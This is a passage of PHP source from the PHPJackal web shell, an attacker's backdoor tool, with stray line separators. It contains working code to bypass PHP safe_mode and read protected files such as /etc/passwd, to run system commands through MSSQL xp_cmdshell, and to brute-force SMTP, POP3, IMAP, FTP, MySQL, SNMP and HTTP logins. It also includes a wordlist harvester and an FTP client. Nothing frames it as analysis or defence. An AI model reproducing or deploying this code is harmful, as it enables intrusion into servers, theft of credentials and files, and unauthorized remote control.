mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
|
||
|
readfile('/tmp/mb_send_mail');
|
||
|
$i++;
|
||
|
}
|
||
|
if(function_exists('curl_init')){
|
||
|
echo "$pr$i:(curl_init [A]$po";
|
||
|
$fh=curl_init('file://'.$file.'');
|
||
|
$tmp=curl_exec($fh);
|
||
|
echo $tmp;
|
||
|
$i++;
|
||
|
echo "$pr$i:(curl_init [B]$po";
|
||
|
$i++;
|
||
|
if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
|
||
|
else $ch=curl_init('file://'.$file."\x00".__FILE__);
|
||
|
var_dump(curl_exec($ch));
|
||
|
}
|
||
|
if(is_writable('.')){
|
||
|
echo "$pr$i:(php.ini$po";
|
||
|
file_put_contents('php.ini','safe_mode = Off');
|
||
|
readfile($file);
|
||
|
unlink('php.ini');
|
||
|
$i++;
|
||
|
}
|
||
|
if(is_object($ws=new COM('WScript.Shell'))){
|
||
|
echo "$pr$i:(COM$po";
|
||
|
echo $exec=comshelL("type \"$file\"",$ws);
|
||
|
$i++;
|
||
|
}
|
||
|
if(checkfunctioN('win_shell_execute')){
|
||
|
echo "$pr$i:(win32std$po";
|
||
|
echo winshelL("type \"$file\"");
|
||
|
$i++;
|
||
|
}
|
||
|
if(checkfunctioN('win32_create_service')){
|
||
|
echo "$pr$i:(win32service$po";
|
||
|
echo srvshelL("type \"$file\"");
|
||
|
$i++;
|
||
|
}
|
||
|
if(function_exists('imap_open')){
|
||
|
echo "$pr$i:(imap [A]$po";
|
||
|
$str=imap_open('/etc/passwd','','');
|
||
|
$list=imap_list($str,$file,'*');
|
||
|
for($i=0;$i<count($list);$i++)echo $list[$i]."\n";
|
||
|
imap_close($str);
|
||
|
$i++;
|
||
|
echo "$pr$i:(imap [B]$po";
|
||
|
$str=imap_open($file,'','');
|
||
|
$tmp=imap_body($str,1);
|
||
|
echo $tmp;
|
||
|
imap_close($str);
|
||
|
$i++;
|
||
|
}
|
||
|
if($file=='/etc/passwd'){
|
||
|
echo "$pr$i:(posix$po";
|
||
|
for($uid=0;$uid<99999;$uid++){
|
||
|
$h=posix_getpwuid($uid);
|
||
|
if(!empty($h))foreach($h as $v)echo "$v:";
|
||
|
echo "\r\n";
|
||
|
}
|
||
|
}
|
||
|
echo "\n</pre></font>";
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['show'])){
|
||
|
echo "<pre>$pr$i:(glob$po";
|
||
|
$con=glob("$file*");
|
||
|
foreach ($con as $v){
|
||
|
echo "$v\n";
|
||
|
}
|
||
|
$i++;
|
||
|
if(function_exists('imap_open')){
|
||
|
echo "$pr$i:(imap$po";
|
||
|
$str=imap_open('/etc/passwd','','');
|
||
|
$s=explode("|",$file);
|
||
|
if(count($s)>1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');
|
||
|
for($i=0;$i<count($list);$i++)echo "$list[$i]\r\n";
|
||
|
imap_close($str);
|
||
|
$i++;
|
||
|
}
|
||
|
if(is_object($ws=new COM('WScript.Shell'))){
|
||
|
echo "$pr$i:(COM$po";
|
||
|
$exec=comshelL("dir \"$file\"",$ws);
|
||
|
$exec=str_replace("\t",'',$exec);
|
||
|
echo $exec;
|
||
|
$i++;
|
||
|
}
|
||
|
if(checkfunctioN('win_shell_execute')){
|
||
|
echo "$pr$i:(win32std$po";
|
||
|
echo winshelL("dir \"$file\"");
|
||
|
$i++;
|
||
|
}
|
||
|
if(checkfunctioN('win32_create_service')){
|
||
|
echo "$pr$i:(win32service$po";
|
||
|
echo srvshelL("dir \"$file\"");
|
||
|
$i++;
|
||
|
}
|
||
|
echo "\n</pre></font>";
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['sql'])){
|
||
|
$ta=uniqid('N');
|
||
|
$s=array("CREATE TEMPORARY TABLE $ta (file LONGBLOB)","LOAD DATA INFILE '".addslashes($_REQUEST['file'])."' INTO TABLE $ta","SELECT * FROM $ta");
|
||
|
$l=mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
|
||
|
mysql_select_db($_REQUEST['db'],$l);
|
||
|
echo '<pre><font color=blue>';
|
||
|
foreach($s as $v){
|
||
|
$q = mysql_query($v,$l);
|
||
|
while($d=mysql_fetch_row($q))echo htmlspecialchars($d[0]);
|
||
|
}
|
||
|
echo '</pre></font>';
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){
|
||
|
$res='';
|
||
|
$tb=uniqid('NJ');
|
||
|
$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']);
|
||
|
mssql_select_db($_REQUEST['dB'],$db);
|
||
|
mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db);
|
||
|
mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db);
|
||
|
$re=mssql_query("select * from $tb",$db);
|
||
|
while(($row=mssql_fetch_row($re)))
|
||
|
{
|
||
|
$res.= $row[0]."\r\n";
|
||
|
}
|
||
|
mssql_query("drop table $tb",$db);
|
||
|
mssql_close($db);
|
||
|
echo "<center><textarea rows='18' cols='64'>$res</textarea></center><br>";
|
||
|
}
|
||
|
$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd';
|
||
|
$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root';
|
||
|
$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456';
|
||
|
$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test';
|
||
|
echo "<center>${t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>$et<br>${t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='$u'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='$p'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='$d'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit name=sql value='Read'></form>$et<br>${t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']); else echo 'sa'; echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";if (!empty($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";if (!empty($_REQUEST['coM'])) echo htmlspecialchars($_REQUEST['coM']);else echo 'dir c:';echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";if(isset($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);else echo 'master';echo "'> $hcwd<input class=buttons type=submit value='Execute'></form>$et</center>";
|
||
|
}
|
||
|
function crackeR(){
|
||
|
global $t,$et,$crack,$cwd;
|
||
|
$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0;
|
||
|
if(!empty($_REQUEST['cracK']) && !$check){
|
||
|
$c=htmlspecialchars($_REQUEST['cracK']);
|
||
|
echo "<center>$t$c cracker:$crack";
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['cracK']) && $check){
|
||
|
$pro=strtolower($_REQUEST['cracK']).'checK';
|
||
|
$target=$_REQUEST['target'];
|
||
|
$type=$_REQUEST['combo'];
|
||
|
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
|
||
|
$dictionary=fopen($_REQUEST['dictionary'],'r');
|
||
|
if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
|
||
|
if($dictionary){
|
||
|
echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>';
|
||
|
while(!feof($dictionary)){
|
||
|
if($type){
|
||
|
$combo=trim(fgets($dictionary)," \n\r");
|
||
|
$user=substr($combo,0,strpos($combo,':'));
|
||
|
$pass=substr($combo,strpos($combo,':')+1);
|
||
|
}else{
|
||
|
$pass=trim(fgets($dictionary)," \n\r");
|
||
|
}
|
||
|
$ret=$pro($target,$user,$pass,5);
|
||
|
if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{
|
||
|
if($ret){$x="U: $user P: $pass";echo "$x<br>";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}}
|
||
|
}
|
||
|
echo '<br>Done</font>';
|
||
|
fclose($dictionary);
|
||
|
}
|
||
|
else{
|
||
|
echo "$errorbox Can not open dictionary.$et";
|
||
|
}
|
||
|
}
|
||
|
else{
|
||
|
echo "<center><table border=0 bgcolor=#333333><tr><td><a href='".hlinK("seC=hc&workingdiR=$cwd")."'>[Hash]</a> - <a href='".hlinK("seC=cr&cracK=SMTP&workingdiR=$cwd")."'>[SMTP]</a> - <a href='".hlinK("seC=cr&cracK=POP3&workingdiR=$cwd")."'>[POP3]</a> - <a href='".hlinK("seC=cr&cracK=IMAP&workingdiR=$cwd")."'>[IMAP]</a> - <a href='".hlinK("seC=cr&cracK=FTP&workingdiR=$cwd")."'>[FTP]</a> - <a href='".hlinK("seC=snmp&workingdiR=$cwd")."'>[SNMP]</a> - <a href='".hlinK("seC=cr&cracK=MySQL&workingdiR=$cwd")."'>[MySQL]</a> - <a href='".hlinK("seC=cr&cracK=MSSQL&workingdiR=$cwd")."'>[MSSQL]</a> - <a href='".hlinK("seC=fcr&workingdiR=$cwd")."'>[HTTP Form]</a> - <a href='".hlinK("seC=auth&workingdiR=$cwd")."'>[HTTP Auth(basic)]</a> - <a href='".hlinK("seC=dic&workingdiR=$cwd")."'>[Dictionary maker]</a>$et</center>";
|
||
|
}
|
||
|
}
|
||
|
function snmpcrackeR(){
|
||
|
global $t,$et,$errorbox,$hcwd;
|
||
|
if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
|
||
|
$target=$_REQUEST['target'];
|
||
|
if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
|
||
|
$dictionary=fopen($_REQUEST['dictionary'],'r');
|
||
|
if($dictionary){
|
||
|
echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>';
|
||
|
while(!feof($dictionary)){
|
||
|
$com=trim(fgets($dictionary)," \n\r");
|
||
|
$res=snmpchecK($target,$com,2);
|
||
|
if($res){echo "$com<br>";if($log)file_add_contentS($file,"$com\r\n");}
|
||
|
}
|
||
|
echo '<br>Done</font>';
|
||
|
fclose($dictionary);
|
||
|
}
|
||
|
else{
|
||
|
echo "$errorbox Can not open dictionary.$et";
|
||
|
}
|
||
|
}else echo "<center>${t}SNMP cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'>$hcwd<tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit value=Start></form>$et</center>";
|
||
|
}
|
||
|
function dicmakeR(){
|
||
|
global $errorbox,$windows,$footer,$t,$et,$hcwd;
|
||
|
$combo=(empty($_REQUEST['combo']))?0:1;
|
||
|
if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
|
||
|
$min=$_REQUEST['min'];
|
||
|
$max=$_REQUEST['max'];
|
||
|
if($max<$min)die($errorbox."Bad input!$et".$footer);
|
||
|
$s=$w='';
|
||
|
$out=$_REQUEST['output'];
|
||
|
$r=$_REQUEST['range'];
|
||
|
$dic=fopen($out,'w');
|
||
|
if($r==1){
|
||
|
for($s=pow(10,$min-1);$s<pow(10,$max-1);$s++){
|
||
|
$w=$s;
|
||
|
if($combo)$w="$w:$w";
|
||
|
fwrite($dic,$w."\n");
|
||
|
}
|
||
|
}
|
||
|
else{
|
||
|
$s=str_repeat($r,$min);
|
||
|
while(strlen($s)<$max){
|
||
|
$w=$s;
|
||
|
if($combo)$w="$w:$w";
|
||
|
fwrite($dic,$w."\n");
|
||
|
$s++;
|
||
|
}
|
||
|
}
|
||
|
fclose($dic);
|
||
|
echo '<font color=blue>Done</font>';
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
|
||
|
$input=fopen($_REQUEST['input'],'r');
|
||
|
if(!$input){
|
||
|
if($windows)echo $errorbox.'Unable to read from '.htmlspecialchars($_REQUEST['input'])."$et<br>";
|
||
|
else{
|
||
|
$input=explode("\n",shelL("cat $input"));
|
||
|
$output=fopen($_REQUEST['output'],'w');
|
||
|
if($output){
|
||
|
foreach($input as $in){
|
||
|
$user=$in;
|
||
|
$user=trim(fgets($in)," \n\r");
|
||
|
if(!strstr($user,':'))continue;
|
||
|
$user=substr($user,0,(strpos($user,':')));
|
||
|
if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");
|
||
|
}
|
||
|
fclose($input);fclose($output);
|
||
|
echo '<font color=blue>Done</font>';
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
else{
|
||
|
$output=fopen($_REQUEST['output'],'w');
|
||
|
if($output){
|
||
|
while(!feof($input)){
|
||
|
$user=trim(fgets($input)," \n\r");
|
||
|
if(!strstr($user,':'))continue;
|
||
|
$user=substr($user,0,(strpos($user,':')));
|
||
|
if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");
|
||
|
}
|
||
|
fclose($input);fclose($output);
|
||
|
echo '<font color=blue>Done</font>';
|
||
|
}
|
||
|
else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et<br>";
|
||
|
}
|
||
|
}elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
|
||
|
$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
|
||
|
if($combo && $res){
|
||
|
$file=file($_REQUEST['output']);
|
||
|
$output=fopen($_REQUEST['output'],'w');
|
||
|
foreach($file as $v)fwrite($output,"$v:$v\n");
|
||
|
fclose($output);
|
||
|
}
|
||
|
echo '<font color=blue>Done</font>';
|
||
|
}else{
|
||
|
$temp=whereistmP().DIRECTORY_SEPARATOR;
|
||
|
echo "<center>${t}Wordlist generator:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Range:</td><td bgcolor='#666666'><select name=range><option value=a>a-z</option><option value=A>A-Z</option><option value=1>0-9</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Min lenght:</td><td bgcolor='#808080'><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Max lenght:</td><td bgcolor='#666666'><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox name=combo style='border-width:1px;background-color:#666666;' value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Grab from:</td><td bgcolor='#666666'><input type=text value='/etc/passwd' name=input size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Grab></form>$et<br>${t}Download dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>URL:</td><td bgcolor='#666666'><input type=text value='http://vburton.ncsa.uiuc.edu/wordlist.txt' name=url size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Get></form>$et</center>";}
|
||
|
}
|
||
|
function ftpclienT(){
|
||
|
global $t,$cwd,$hcwd,$errorbox,$et;
|
||
|
$td="<td bgcolor='#333333' width='50%'>";
|
||
|
if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && function_exists('ftp_connect')){
|
||
|
$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT'];
|
||
|
$con=ftp_connect($_REQUEST['hosT'],21,10);
|
||
|
if($con){
|
||
|
$ftp=ftp_login($con,$user,$pass);
|
||
|
if($ftp){
|
||
|
if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']);
|
||
|
if(!empty($_REQUEST['filE'])){
|
||
|
$file=$_REQUEST['filE'];
|
||
|
$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII;
|
||
|
if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode);
|
||
|
elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode);
|
||
|
elseif(isset($_REQUEST['rM'])){
|
||
|
ftp_rmdir($con,$file);
|
||
|
ftp_delete($con,$file);
|
||
|
}
|
||
|
elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file);
|
||
|
}
|
||
|
$pwd=ftp_pwd($con);
|
||
|
$dir=ftp_nlist($con,'');
|
||
|
$d=opendir($cwd);
|
||
|
echo "<table border=0 style='border-collapse: collapse' width='100%'><tr>${td}Server:</td>${td}Client:</td></tr><form method=POST><tr>$td<input type=text value='$pwd' name=PWD size=50><input value=Change class=buttons type=submit></td>$td<input size=50 type=text value='$cwd' name=workingdiR><input value=Change class=buttons type=submit></td></tr><tr>$td";
|
||
|
foreach($dir as $n)echo "$n<br>";
|
||
|
echo "</td>$td";while($cdir=readdir($d))if($cdir!='.' && $cdir!='..')echo "$cdir<br>"; echo "</td></tr><tr>${td}Name:<input type=text name=filE><input type=checkbox style='border-width:1px;background-color:#333333;' name=modE value=1>Binary <input type=submit name=geT class=buttons value=Get><input type=submit name=puT class=buttons value=Put><input type=submit name=rM class=buttons value=Remove><input type=submit name=mD class=buttons value='Make dir'></td>$td<input type=hidden value='$user' name=useR><input type=hidden value='$pass' name=pasS><input type=hidden value='$host' name=hosT></form>$et";
|
||
|
}else echo "$errorbox Wrong username or password$et";
|
||
|
}else echo "$errorbox Can not connect to server!$et";
|
||
|
}
|
||
|
else{
|
||
|
echo "<center>${t}FTP cilent:</td><form name=client method='POST'><td bgcolor='#333333'></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value=localhost name=hosT size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value=anonymous size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value=admin@nasa.gov name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et</center>";
|
||
|
}
|
||
|
}
|
||
|
function calC(){
|
||
|
global $t,$et,$hcwd;
|
||
|
$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev');
|
||
|
if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
|
||
|
$to=$_REQUEST['to'];
|
||
|
echo "<center>${t}Output:<br><textarea rows='10' cols='64'>";
|
||
|
if($to=='hex')for($i=0;$i<strlen($_REQUEST['input']);$i++)echo '%'.strtoupper(dechex(ord($_REQUEST['input']{$i})));
|
||
|
else echo $to($_REQUEST['input']);
|
||
|
echo "</textarea>$et</center><br>";
|
||
|
}
|
||
|
echo "<center>${t}Convertor:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Input:</td><td bgcolor='#666666'><textarea rows='10' name='input' cols='64'>";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#808080'>Task:</td><td bgcolor='#808080'><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>Crc32</option><option value=strrev>Reverse</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=decbin>Decimal to binary</option><option value=bindec>Binary to decimal</option><option value=dechex>Decimal to hex</option><option value=hexdec>Hex to decimal</option><option value=hex>ASCII to hex</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right><input class=buttons type=submit value=Convert>$hcwd</form>$et</center>";
|
||
|
}
|
||
|
function authcrackeR(){
|
||
|
global $errorbox,$et,$t,$hcwd;
|
||
|
if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
|
||
|
if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
|
||
|
$data='';
|
||
|
$method=($_REQUEST['method'])?'POST':'GET';
|
||
|
if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
|
||
|
spliturL($_REQUEST['target'],$host,$page);
|
||
|
$type=$_REQUEST['combo'];
|
||
|
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
|
||
|
if($method=='GET')$page.=$data;
|
||
|
$dictionary=fopen($_REQUEST['dictionary'],'r');
|
||
|
echo '<font color=blue>';
|
||
|
while(!feof($dictionary)){
|
||
|
if($type){
|
||
|
$combo=trim(fgets($dictionary)," \n\r");
|
||
|
$user=substr($combo,0,strpos($combo,':'));
|
||
|
$pass=substr($combo,strpos($combo,':')+1);
|
||
|
}else{
|
||
|
$pass=trim(fgets($dictionary)," \n\r");
|
||
|
}
|
||
|
$so=fsockopen($host,80,$en,$es,5);
|
||
|
if(!$so){echo "$errorbox Can not connect to host$et";break;}
|
||
|
else{
|
||
|
$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
|
||
|
if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data);
|
||
|
$packet.="\r\n\r\n";
|
||
|
$packet.=$data;
|
||
|
fputs($so,$packet);
|
||
|
$res=substr(fgets($so),9,2);
|
||
|
fclose($so);
|
||
|
if($res=='20'){echo "U: $user P: $pass</br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");}
|
||
|
}
|
||
|
}
|
||
|
echo 'Done!</font>';
|
||
|
}else echo "<center><form method='POST' name=form>${t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
|
||
|
}
|
||
|
function openiT($name){
|
||
|
$ext=strtolower(substr($name,strrpos($name,'.')+1));
|
||
|
$src=array('php','php3','php4','phps','phtml','phtm','inc');
|
||
|
if(in_array($ext,$src))highlight_file($name);
|
||
|
else echo '<font color=blue><pre>'.htmlspecialchars(file_get_contents($name)).'</pre></font>';
|
||
|
}
|
||
|
function opensesS($name){
|
||
|
$sess=file_get_contents($name);
|
||
|
$var=explode(';',$sess);
|
||
|
echo "<pre>Name\tType\tValue\r\n";
|
||
|
foreach($var as $v){
|
||
|
$t=explode('|',$v);
|
||
|
$c=explode(':',$t[1]);
|
||
|
$y='';
|
||
|
if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';
|
||
|
echo $t[0]."\t$y\t".$c[1]."\r\n";
|
||
|
}
|
||
|
echo '</pre>';
|
||
|
}
|
||
|
function logouT(){
|
||
|
setcookie('passw','',time()-10000);
|
||
|
header('Location: '.hlinK());
|
||
|
}
|
||
|
?>
|
||
|
<img src="http://flyphoto.us/images/shell.jpg"/>
|
||
|
<html>
|
||
|
<head>
|
||
|
<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style>
|
||
|
<meta http-equiv="Content-Language" content="en-us">
|
||
|
<script language="JavaScript" type="text/JavaScript">
|
||
|
function HS(box){
|
||
|
if(document.getElementById(box).style.display!="none"){
|
||
|
document.getElementById(box).style.display="none";
|
||
|
document.getElementById('lk').innerHTML="+";
|
||
|
}
|
||
|
else{
|
||
|
document.getElementById(box).style.display="";
|
||
|
document.getElementById('lk').innerHTML="-";
|
||
|
}
|
||
|
}
|
||
|
function chmoD($file){
|
||
|
$ch=prompt("Changing file mode["+$file+"]: ex. 777","");
|
||
|
if($ch != null)location.href="<?php echo hlinK('seC=fm&workingdiR='.addslashes($cwd).'&chmoD=');?>"+$file+"&modE="+$ch;
|
||
|
}
|
||
|
</script>
|
||
|
<title>PHPJackal [<?php echo $cwd; ?>]</title>
|
||
|
</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
|
||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
|
||
|
